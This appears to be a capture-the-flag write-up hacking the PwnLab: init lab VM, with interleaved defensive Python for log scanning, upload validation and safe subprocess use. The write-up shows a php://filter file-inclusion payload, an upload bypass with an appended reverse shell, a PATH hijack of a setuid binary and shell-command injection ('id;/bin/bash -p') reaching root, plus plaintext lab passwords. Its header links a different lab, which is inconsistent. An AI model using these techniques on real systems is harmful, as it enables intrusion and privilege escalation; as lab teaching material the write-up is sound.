Target environment
https://www.vulnhub.com/entry/skytower-1,96/
Target IP: 192.168.56.103
Kali IP: 192.168.56.102
Nmap scan
Port scan
# Nmap 7.93 scan initiated Mon Jul 10 02:36:32 2023 as: nmap -Pn --min-rate=10000 -p- -oN nmap/ports 192.168.56.103
Nmap scan report for 192.168.56.103
Host is up (0.019s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
111/tcp open rpcbind
3306/tcp open mysql
39285/tcp open unknown
MAC Address: 08:00:27:4E:3E:AA (Oracle VirtualBox virtual NIC)
# Nmap done at Mon Jul 10 02:36:47 2023 -- 1 IP address (1 host up) scanned in 15.95 seconds
Service scan
# Nmap 7.93 scan initiated Mon Jul 10 02:38:36 2023 as: nmap -sVC -O -p80,111,3306,39285 -oN nmap/details 192.168.56.103
Nmap scan report for 192.168.56.103
Host is up (0.00074s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: PwnLab Intranet Image Hosting
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100024 1 39285/tcp status
| 100024 1 41776/tcp6 status
| 100024 1 50160/udp6 status
|_ 100024 1 54782/udp status
3306/tcp open mysql MySQL 5.5.47-0+deb8u1
| mysql-info:
| Protocol: 10
| Version: 5.5.47-0+deb8u1
| Thread ID: 41
| Capabilities flags: 63487
| Some Capabilities: ODBCClient, Support41Auth, ConnectWithDatabase, InteractiveClient, LongColumnFlag, LongPassword, SupportsTransactions, FoundRows, SupportsLoadDataLocal, IgnoreSpaceBeforeParenthesis, DontAllowDatabaseTableColumn, SupportsCompression, Speaks41ProtocolOld, Speaks41ProtocolNew, IgnoreSigpipes, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
| Status: Autocommit
| Salt: *}^>W|+\o;t[H7z$@UlA
|_ Auth Plugin Name: mysql_native_password
39285/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:4E:3E:AA (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul 10 02:38:57 2023 -- 1 IP address (1 host up) scanned in 24.39 seconds
Vulnerability scan
Scan summary
The nmap results show ports 80, 111, 3306 and 39285 open. Since 111 and 39285 are both RPC services, port 80 is attacked first, then port 3306.
Port 80
Browse the site while running directory brute-forcing in parallel.
Directory brute force
┌──(kali㉿kali)-[~/oscp/14.PWNLAB-INIT]
└─$ sudo gobuster dir --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,rar,txt,html,jsp,zip -u http://192.168.56.103 | tee gobuster.log
[sudo] kali 的密码:
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.103
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: php,txt,rar,html,jsp,zip
[+] Timeout: 10s
===============================================================
2023/07/11 02:54:56 Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 332]
/.html (Status: 403) [Size: 294]
/images (Status: 301) [Size: 317] [--> http://192.168.56.103/images/]
/.php (Status: 403) [Size: 293]
/login.php (Status: 200) [Size: 250]
/upload (Status: 301) [Size: 317] [--> http://192.168.56.103/upload/]
/upload.php (Status: 200) [Size: 19]
/config.php (Status: 200) [Size: 0]
/.html (Status: 403) [Size: 294]
/.php (Status: 403) [Size: 293]
/server-status (Status: 403) [Size: 302]
Progress: 1543911 / 1543927 (100.00%)
===============================================================
2023/07/11 03:00:38 Finished
===============================================================
Reading the pages and their source turned up nothing useful. Universal-password (SQL injection bypass) strings and default credentials on the login form did not work, but visiting the login and upload pages shows a URL parameter that looks like a file include. The next step is to exploit it with a PHP stream wrapper.
LFI exploitation
Because the site's include executes any PHP it loads, the source has to be encoded so that it is displayed rather than run; the php://filter wrapper does this. The payload is built as: ?file=php://filter/read=convert.base64-encode/resource=<file path>
Decode the output and save the result locally. From browsing the site, the files to retrieve are index, login and upload. Auditing the saved PHP code, index first: the interesting part is that it includes a file based on the lang parameter taken from the cookie, which is worth noting.
Next is login, where the interesting part is:
This needs config.php, fetched with the same wrapper: http://192.168.56.103/?page=php://filter/read=convert.base64-encode/resource=config (I don't know why config.php does not display here while config does). Download the encoded code, decode it and save it.
Last is upload, which implements the upload restrictions; bypassing them needs a careful read, but first we try to get credentials and log in, since that is what leads to this step.
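As an added defensive example (not part of the original writeup), the following Python scans constructed Apache access-log lines for stream-wrapper and path-traversal values in include-style parameters such as the page parameter used above, and shows the allowlist-based resolver the include should have used instead (the same resolver applies to the lang cookie value, though cookies only reach the log if the LogFormat records them). The log lines, the parameter names in INCLUDE_PARAMS and the PAGES allowlist are assumptions made for this example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-log lines (not taken from the original page);
# the addresses are the lab addresses used in the writeup.
SAMPLE_LOG = """\
192.168.56.102 - - [11/Jul/2023:03:05:12 +0000] "GET /?page=login HTTP/1.1" 200 250 "-" "Mozilla/5.0"
192.168.56.102 - - [11/Jul/2023:03:06:40 +0000] "GET /?page=php://filter/read=convert.base64-encode/resource=config HTTP/1.1" 200 148 "-" "Mozilla/5.0"
192.168.56.102 - - [11/Jul/2023:03:07:01 +0000] "GET /?page=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.56.102 - - [11/Jul/2023:03:08:15 +0000] "GET /images/logo.png HTTP/1.1" 200 3021 "-" "Mozilla/5.0"
"""

# Parameter names assumed to feed include() in the audited application.
INCLUDE_PARAMS = ("page", "file", "lang")
WRAPPER_RE = re.compile(r"^\s*(php|data|expect|phar|zip|glob|file|ftp|https?)://", re.I)
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
REQUEST_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"'
)


def classify_include_value(value):
    """Return 'wrapper', 'traversal' or None for one include-parameter value."""
    value = unquote(value)  # parse_qs decoded once already; this catches double encoding
    if WRAPPER_RE.search(value):
        return "wrapper"
    if TRAVERSAL_RE.search(value) or "\x00" in value:
        return "traversal"
    return None


def scan_log(text):
    """Return one finding per request whose include-style parameter looks malicious."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group("target")).query
        for name, values in parse_qs(query, keep_blank_values=True).items():
            if name not in INCLUDE_PARAMS:
                continue
            for value in values:
                kind = classify_include_value(value)
                if kind:
                    findings.append({"src": m.group("src"), "ts": m.group("ts"),
                                     "param": name, "value": value, "kind": kind})
    return findings


# Allowlist the include should use: the parameter selects a key, never a path,
# so wrappers, traversal and the ".php"-suffix trick all stop mattering.
PAGES = {"index": "index.php", "login": "login.php", "upload": "upload.php"}


def resolve_page(value, pages=PAGES):
    """Map a page/lang parameter to a file name, or None if it is not an allowed key."""
    return pages.get(unquote(value))


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} {f['kind']:9} {f['param']}={f['value']}")
```

Run as a script it prints the two suspicious requests from the sample; on a real server feed it the access log and extend INCLUDE_PARAMS with whatever names the application actually passes to include.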
config.php yielded a root credential. Logging in to the web page with it failed; since port 3306 is open, we try MySQL instead, which succeeds.
Port 3306
Three users were found, with base64-encoded passwords. Decode them!
Logging in with these credentials works, which takes us to the file upload stage.
Back to port 80
File upload
Code audit shows that only files with whitelisted extensions can be uploaded, and the file must also carry a matching MIME file header.
So a file is crafted accordingly. Inspecting the captured request, I inserted a reverse shell at the end of the file.
The upload succeeds, but how do we execute the reverse shell? Back to the code audit: the index file seen earlier includes whatever the lang value in the cookie points to, so it will be parsed as PHP.
When building the cookie, remember to go up one directory level.
Gaining a foothold
Checking the passwd file, the users seen in MySQL also exist on the system. Trying to switch user gives an error; use python to upgrade the shell's interactivity.
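As an added example that is not the page's or the lab's code, here is the server-side validation the audited upload.php lacks. Besides the extension allowlist and the MIME header it already enforces, this version checks the magic bytes against the declared extension, walks the PNG chunk list and rejects anything after the IEND chunk (which is exactly where a payload appended to the end of an image sits), and rejects PHP open tags anywhere in the body. The 1x1 PNG is constructed inside the block as sample input; the function names are mine.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Extension allowlist paired with the magic bytes each type must start with.
ALLOWED = {"png": PNG_SIG, "gif": b"GIF8", "jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff"}
PHP_MARKERS = (b"<?php", b"<?=", b'<script language="php"')


def _chunk(ctype, data):
    """Build one PNG chunk: length, type, data, CRC over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def make_png_1x1():
    """Constructed sample input: a valid 1x1 RGB PNG (not a file from the lab)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # 1x1, 8-bit depth, RGB
    raw = b"\x00" + b"\x00\x00\x00"                      # filter byte + one black pixel
    return (PNG_SIG + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b""))


def png_trailing_bytes(data):
    """Walk the chunk list; return the byte count after IEND, or -1 if malformed."""
    if not data.startswith(PNG_SIG):
        return -1
    pos = len(PNG_SIG)
    while pos + 12 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length
        if end > len(data):
            return -1
        (crc,) = struct.unpack(">I", data[end - 4:end])
        if crc != zlib.crc32(data[pos + 4:end - 4]) & 0xFFFFFFFF:
            return -1
        pos = end
        if ctype == b"IEND":
            return len(data) - pos
    return -1  # ran out of data before an IEND chunk


def validate_upload(filename, content_type, data):
    """Return 'accept' or a 'reject: <reason>' string for one uploaded file."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED:
        return "reject: extension"
    if not content_type.lower().startswith("image/"):
        return "reject: content-type"
    if not data.startswith(ALLOWED[ext]):
        return "reject: magic"
    if any(marker in data for marker in PHP_MARKERS):
        return "reject: php-marker"
    if ext == "png":
        trailing = png_trailing_bytes(data)
        if trailing < 0:
            return "reject: malformed"
        if trailing > 0:
            return "reject: trailing-data"
    return "accept"


if __name__ == "__main__":
    clean = make_png_1x1()
    print(validate_upload("avatar.png", "image/png", clean))
    print(validate_upload("avatar.png", "image/png", clean + b"<?php echo 'appended'; ?>"))
```

The marker scan is the weaker of the two checks (a payload can avoid the literal tags), so the structural check matters more; and because the include of the lang cookie value would still run any file that slips through, uploads also belong in a directory where the web server does not execute PHP.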
www-data@pwnlab:/var/www/html$ su kent
su kent
su: must be run from a terminal
www-data@pwnlab:/var/www/html$ python -c "import pty;pty.spawn('/bin/bash')"
python -c "import pty;pty.spawn('/bin/bash')"
Lateral movement
Switch to kent and go to /home/kent. Nothing useful there; switching to mike fails authentication, so try kane, which succeeds. In /home/kane there is a file msgmike.
kent@pwnlab:~$ su mike
su mike
Password: SIfdsTEn6I
su: Authentication failure
kent@pwnlab:~$ su kane
su kane
Password: iSv5Ym2GRo
kane@pwnlab:/home/kent$ cd /home/kane
cd /home/kane
kane@pwnlab:~$ ls
msgmike
kane@pwnlab:~$ ls -liah
ls -liah
total 32K
65 drwxr-x--- 2 kane kane 4.0K Jul 11 11:19 .
1558 drwxr-xr-x 6 root root 4.0K Mar 17 2016 ..
30347 -rw------- 1 kane kane 164 Jul 11 10:44 .bash_history
78 -rw-r--r-- 1 kane kane 220 Mar 17 2016 .bash_logout
73 -rw-r--r-- 1 kane kane 3.5K Mar 17 2016 .bashrc
27221 -rwsr-sr-x 1 mike mike 5.1K Mar 17 2016 msgmike
75 -rw-r--r-- 1 kane kane 675 Mar 17 2016 .profile
msgmike has the setuid bit set. First use strings to look at its contents. It calls the cat command without an absolute path, so command hijacking can be tried.
kane@pwnlab:~$ echo $$ # show the shell's process id
echo $$
5041
kane@pwnlab:~$ echo "/bin/bash" >/tmp/cat # write /bin/bash into /tmp/cat
echo "/bin/bash" > /tmp/cat
kane@pwnlab:~$ echo $PATH # show the current $PATH
echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
kane@pwnlab:~$ export PATH=/tmp:$PATH # put /tmp at the front of $PATH
export PATH=/tmp:$PATH
kane@pwnlab:~$ echo $PATH # show the modified $PATH
echo $PATH
/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
kane@pwnlab:~$ ./msgmike # run msgmike
./msgmike
mike@pwnlab:~$ echo $$ # show the shell's process id; it differs now, so the hijack worked
echo $$
5055
mike@pwnlab:~$ whoami # we are now the mike user
whoami
mike
mike@pwnlab:~$ whoami
whoami
mike
mike@pwnlab:~$ cd /home/mike
cd /home/mike
mike@pwnlab:/home/mike$ ls -liah
ls -liah
total 28K
63 drwxr-x--- 2 mike mike 4.0K Mar 17 2016 .
1558 drwxr-xr-x 6 root root 4.0K Mar 17 2016 ..
74 -rw-r--r-- 1 mike mike 220 Mar 17 2016 .bash_logout
70 -rw-r--r-- 1 mike mike 3.5K Mar 17 2016 .bashrc
27220 -rwsr-sr-x 1 root root 5.3K Mar 17 2016 msg2root
71 -rw-r--r-- 1 mike mike 675 Mar 17 2016 .profile
Use strings to look at msg2root. It executes the command /bin/echo %s >> /root/messages.txt, which appends the message to /root/messages.txt. What if the message is id;id;? The command becomes /bin/echo id;id; >> /root/messages.txt, which will print the output of id!
Let's test whether this reasoning holds.
mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: id;id;
id;id;
id
uid=1002(mike) gid=1002(mike) euid=0(root) egid=0(root) groups=0(root),1003(kane)
It worked, and as root!
Privilege escalation
Since we are root, spawn a bash shell.
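Both setuid binaries on this box fail in the same way: they hand a string to a shell, which resolves cat through the caller's PATH (msgmike) and splices the user's message into the command line (msg2root). The following Python is an added example, not the binaries' code, that shows the same two mistakes with subprocess next to the fixed forms, plus a small PATH audit a defender can run on a suspicious shell; the log-file path and the sample PATH values are constructed for the demo.

```python
import os
import subprocess

SAFE_PATH = "/usr/local/bin:/usr/bin:/bin"
SAFE_ENV = {"PATH": SAFE_PATH}  # fixed environment for anything a privileged program spawns


# --- Vulnerable forms, mirroring what strings showed --------------------------

def read_message_vulnerable(path):
    # "cat" is resolved through the caller's PATH, so a /tmp/cat wins if /tmp comes first.
    return subprocess.run("cat " + path, shell=True).returncode


def append_message_vulnerable(log_path, msg):
    # The message is part of the command line: "id;id;" becomes two extra commands.
    return subprocess.run(f"/bin/echo {msg} >> {log_path}", shell=True).returncode


# --- Hardened forms -----------------------------------------------------------

def read_message_hardened(path):
    """Absolute program path, argv list, fixed environment, no shell."""
    return subprocess.run(["/bin/cat", path], env=SAFE_ENV,
                          stdout=subprocess.DEVNULL, check=False).returncode


def append_message_hardened(log_path, msg):
    """Treat the message as data: append it with the file API, never via a shell."""
    with open(log_path, "a", encoding="utf-8") as fh:
        return fh.write(msg + "\n")


def read_back(log_path):
    with open(log_path, encoding="utf-8") as fh:
        return fh.read()


# --- Defender-side audit ------------------------------------------------------

def suspicious_path_entries(path_value):
    """PATH entries an attacker could populate: relative ones and world-writable dirs."""
    bad = []
    for entry in path_value.split(os.pathsep):
        if entry == "" or not entry.startswith("/"):
            bad.append(entry or ".")
            continue
        try:
            if os.stat(entry).st_mode & 0o002:  # other-writable, e.g. /tmp (mode 1777)
                bad.append(entry)
        except FileNotFoundError:
            pass
    return bad


def uses_bare_command(cmd):
    """Audit helper for system()-style strings: is the program looked up via PATH?"""
    return not cmd.lstrip().startswith("/")


if __name__ == "__main__":
    print("suspicious PATH entries:", suspicious_path_entries("/tmp:" + SAFE_PATH))
    print("bare command:", uses_bare_command("cat /home/mike/msg.txt"))
    log = "/tmp/pwnlab_example_messages.txt"  # constructed path for the demo
    append_message_hardened(log, "id;id;")
    print("stored literally:", read_back(log).endswith("id;id;\n"))
    print("hardened cat exit code:", read_message_hardened("/dev/null"))
```

The same rules carry over to the real C binaries: execve an absolute path with a fixed envp, or use the file API for the append, instead of system(); and the PATH audit is the check to run whenever a privileged program's behaviour depends on the invoking user's environment.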
mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: id;/bin/bash -p
id;/bin/bash -p
id
bash-4.3# echo $PATH # remember to restore $PATH: the earlier /tmp/cat and $PATH change may still be in effect; below is the value after restoring it
echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
bash-4.3# whoami
whoami
root
bash-4.3# uname -a
uname -a
Linux pwnlab 3.16.0-4-686-pae #1 SMP Debian 3.16.7-ckt20-1+deb8u4 (2016-02-29) i686 GNU/Linux
bash-4.3# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN group default qlen 1000
link/ether 08:00:27:4e:3e:aa brd ff:ff:ff:ff:ff:ff
inet 192.168.56.103/24 brd 192.168.56.255 scope global eth0
valid_lft forever preferred_lft forever
inet6 fe80::a00:27ff:fe4e:3eaa/64 scope link
valid_lft forever preferred_lft forever
bash-4.3# cat /root/flag.txt
cat /root/flag.txt
.-=~=-. .-=~=-.
(__ _)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(__ _)
(_ ___) _____ _ (_ ___)
(__ _) / __ \ | | (__ _)
( _ __) | / \/ ___ _ __ __ _ _ __ __ _| |_ ___ ( _ __)
(__ _) | | / _ \| '_ \ / _` | '__/ _` | __/ __| (__ _)
(_ ___) | \__/\ (_) | | | | (_| | | | (_| | |_\__ \ (_ ___)
(__ _) \____/\___/|_| |_|\__, |_| \__,_|\__|___/ (__ _)
( _ __) __/ | ( _ __)
(__ _) |___/ (__ _)
(__ _) (__ _)
(_ ___) If you are reading this, means that you have break 'init' (_ ___)
( _ __) Pwnlab. I hope you enjoyed and thanks for your time doing ( _ __)
(__ _) this challenge. (__ _)
(_ ___) (_ ___)
( _ __) Please send me your feedback or your writeup, I will love ( _ __)
(__ _) reading it (__ _)
(__ _) (__ _)
(__ _) For sniferl4bs.com (__ _)
( _ __) claor@PwnLab.net - @Chronicoder ( _ __)
(__ _) (__ _)
(_ ___)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(_ ___)
`-._.-' `-._.-'
Summary
1. When a file inclusion vulnerability is found, PHP stream wrappers can be used to retrieve the source; see reference 1;
2. Code-audit skills are needed; file upload bypass techniques still need work;
3. When credentials are found, try them against every service, not just the one they came from;
4. After getting a user's shell, look in their home directory for useful information;
5. When su: must be run from a terminal or similar appears, use python's pty to upgrade the shell;
6. When an executable is found, strings can be used to inspect its contents;
7. Command hijacking requires modifying the $PATH variable; $$ shows the PID of the current shell;
8. When a shell command template is found, for example /bin/echo %s >> /root/messages.txt, look for a way around it: a separator can terminate the command and other commands can follow.
References
1. https://blog.csdn.net/qq_53079406/article/details/125915640
2. https://cyberchef.org/
3. https://www.bilibili.com/video/BV13c411V7dY